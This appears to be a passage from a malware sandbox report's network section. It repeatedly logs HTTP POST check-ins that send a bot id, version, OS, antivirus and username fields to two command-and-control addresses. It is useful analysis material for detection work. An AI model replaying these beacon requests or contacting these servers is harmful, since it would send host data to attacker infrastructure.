                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
